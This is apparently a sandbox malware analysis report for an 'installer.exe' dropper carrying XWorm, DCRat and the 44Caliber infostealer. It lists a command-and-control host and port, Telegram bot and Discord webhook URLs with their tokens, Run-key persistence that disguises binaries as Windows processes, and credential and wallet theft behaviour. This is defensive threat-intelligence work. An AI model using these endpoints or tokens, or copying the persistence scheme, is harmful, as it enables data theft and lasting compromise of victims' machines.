44caliber | eb346407fcdb18f374cd2c9e309f8d8e986e8679d370c1f530723d0a0c8c3579

Analysis

max time kernel
147s
max time network
148s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
20-05-2024 15:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

installer.exe
Size

7.8MB
MD5

f3d4a56f1ec903519f4c37129423bd73
SHA1

72f0835888eea6e63e142d208b3997a708d7331b
SHA256

eb346407fcdb18f374cd2c9e309f8d8e986e8679d370c1f530723d0a0c8c3579
SHA512

1847df8f65d254a270722bf968b5e14230c3b9cb13b8bd0886aadb7c1da11d8ad43f56483be634b5010919843bbf4997cf5ada31a6a3e81671e173b0994630ac
SSDEEP

98304:5N8TuGLcT86GaEk4xK+NAwmRtaud0bJzREdt5D5MInOdl7QN:A4crE5Gud0lkoxc

Score

10^/10

44caliber dcrat xworm execution infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

lesbian-organ.gl.at.ply.gg:38343

Attributes

Install_directory
%LocalAppData%
install_file
javaw.exe Java(TM) Platform SE binary.exe
telegram
https://api.telegram.org/bot7026469441:AAEt3_GfOceSfMaQnCWR3hwEjHcRpqL852Q/sendMessage?chat_id=1434801883

Extracted

Family

44caliber

https://discord.com/api/webhooks/1239246319751528579/IYIQqMQxDmDpiYnpeLyqY8m4ky9T5uSTQX5CVjPoiRejTrVzBHNdk_JlDhnNu15EaRmp

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber

DcRat 64 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		1244	schtasks.exe
		2980	schtasks.exe
		992	schtasks.exe
		2904	schtasks.exe
		948	schtasks.exe
		3012	schtasks.exe
		2424	schtasks.exe
		2036	schtasks.exe
		2616	schtasks.exe
		1436	schtasks.exe
		1604	schtasks.exe
		1544	schtasks.exe
		2548	schtasks.exe
		2904	schtasks.exe
		1872	schtasks.exe
		856	schtasks.exe
		604	schtasks.exe
		1696	schtasks.exe
		640	schtasks.exe
		3036	schtasks.exe
		3052	schtasks.exe
		772	schtasks.exe
		580	schtasks.exe
		2380	schtasks.exe
		2976	schtasks.exe
		2112	schtasks.exe
		640	schtasks.exe
		2716	schtasks.exe
		2332	schtasks.exe
		3056	schtasks.exe
		1712	schtasks.exe
		1872	schtasks.exe
		2148	schtasks.exe
		816	schtasks.exe
		2720	schtasks.exe
		2088	schtasks.exe
		872	schtasks.exe
		2568	schtasks.exe
		1888	schtasks.exe
		2364	schtasks.exe
		2032	schtasks.exe
		1244	schtasks.exe
		2360	schtasks.exe
File created	C:\Windows\Prefetch\ReadyBoot\27d1bcfc3c54e0		Realtek HD Audio Universal Service.exe
		1644	schtasks.exe
		2696	schtasks.exe
		1124	schtasks.exe
		700	schtasks.exe
		1944	schtasks.exe
		1012	schtasks.exe
		972	schtasks.exe
		808	schtasks.exe
		1680	schtasks.exe
		1444	schtasks.exe
		1228	schtasks.exe
		3000	schtasks.exe
		568	schtasks.exe
		1056	schtasks.exe
		772	schtasks.exe
		1560	schtasks.exe
		2380	schtasks.exe
		2932	schtasks.exe
		2156	schtasks.exe
		2828	schtasks.exe

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0035000000014712-11.dat	family_xworm
behavioral1/memory/2612-30-0x0000000000310000-0x0000000000326000-memory.dmp	family_xworm

Modifies WinLogon for persistence 2 TTPs 34 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1056	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	924	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1560	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2164	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2040	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2364	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2168	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3000	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	604	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	808	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	580	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1412	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1756	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2380	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1012	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2904	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1696	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3004	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1892	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1712	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1556	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	872	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	772	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	948	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	568	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2052	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2216	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1680	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2696	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1444	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2036	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1536	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1544	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2548	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2676	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2572	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2496	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1872	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3052	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	640	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1228	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2720	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1244	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1124	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2904	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	700	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2528	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2568	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2156	1624	schtasks.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2380	1624	schtasks.exe	36

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000b0000000144e8-2.dat	dcrat
behavioral1/memory/2852-20-0x0000000000400000-0x0000000000BC8000-memory.dmp	dcrat
behavioral1/files/0x0007000000014bbc-51.dat	dcrat
behavioral1/memory/1376-55-0x0000000000DE0000-0x0000000001024000-memory.dmp	dcrat
behavioral1/memory/2020-124-0x00000000010E0000-0x0000000001324000-memory.dmp	dcrat
behavioral1/memory/808-167-0x00000000000E0000-0x0000000000324000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1808	powershell.exe
3020	powershell.exe
2756	powershell.exe
1508	powershell.exe

Executes dropped EXE 7 IoCs

pid	Process
2936	Realtek HD Audio Universal Service.exe
2612	javaw.exe Java(TM) Platform SE binary.exe
2752	Updata.exe
1376	Realtek HD Audio Universal Service.exe
2620	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
808	System.exe

Loads dropped DLL 7 IoCs

pid	Process
2852	installer.exe
2936	Realtek HD Audio Universal Service.exe
2936	Realtek HD Audio Universal Service.exe
2852	installer.exe
2852	installer.exe
1628	cmd.exe
1628	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updata = "\"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\MSOCache\\All Users\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default\\Local Settings\\Idle.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Windows\\AppCompat\\Programs\\audiodg.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaw.exe Java(TM) Platform SE binary = "\"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updata = "\"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\bridgeHyperCrt\\WmiPrvSE.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Journal\\smss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Users\\All Users\\Microsoft Help\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Users\\All Users\\Microsoft Help\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaw.exe Java(TM) Platform SE binary = "\"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Users\\All Users\\Favorites\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\bridgeHyperCrt\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\bridgeHyperCrt\\dllhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaw.exe Java(TM) Platform SE binary = "C:\\Users\\Admin\\AppData\\Local\\javaw.exe Java(TM) Platform SE binary.exe"	javaw.exe Java(TM) Platform SE binary.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\Users\\Default\\Recent\\lsm.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaw.exe Java(TM) Platform SE binary = "\"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\bridgeHyperCrt\\WmiPrvSE.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Users\\Default User\\dwm.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\MSOCache\\All Users\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\MSOCache\\All Users\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\bridgeHyperCrt\\schtasks.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Users\\Default User\\dwm.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Users\\All Users\\Favorites\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaw.exe Java(TM) Platform SE binary = "\"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\javaw.exe Java(TM) Platform SE binary = "\"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\bridgeHyperCrt\\dllhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "\"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default\\Local Settings\\Idle.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "\"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\bridgeHyperCrt\\schtasks.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\dwm.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\dwm.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\bridgeHyperCrt\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Windows\\AppCompat\\Programs\\audiodg.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\Users\\Default\\Recent\\lsm.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Journal\\smss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\MSOCache\\All Users\\taskhost.exe\""	Realtek HD Audio Universal Service.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MSBuild\Microsoft\Updata.exe	Realtek HD Audio Universal Service.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\6907c5543411d8	Realtek HD Audio Universal Service.exe
File created	C:\Program Files\Windows Sidebar\fr-FR\javaw.exe Java(TM) Platform SE binary.exe	Realtek HD Audio Universal Service.exe
File created	C:\Program Files\Windows Sidebar\fr-FR\b48fb2592db131	Realtek HD Audio Universal Service.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\ebf1f9fa8afd6d	Realtek HD Audio Universal Service.exe
File created	C:\Program Files\Windows NT\b48fb2592db131	Realtek HD Audio Universal Service.exe
File created	C:\Program Files\Windows Journal\smss.exe	Realtek HD Audio Universal Service.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\cmd.exe	Realtek HD Audio Universal Service.exe
File created	C:\Program Files\Windows NT\javaw.exe Java(TM) Platform SE binary.exe	Realtek HD Audio Universal Service.exe
File created	C:\Program Files\Windows Journal\69ddcba757bf72	Realtek HD Audio Universal Service.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wininit.exe	Realtek HD Audio Universal Service.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\56085415360792	Realtek HD Audio Universal Service.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File created	C:\Windows\AppPatch\Custom\winlogon.exe	Realtek HD Audio Universal Service.exe
File created	C:\Windows\SoftwareDistribution\ScanFile\schtasks.exe	Realtek HD Audio Universal Service.exe
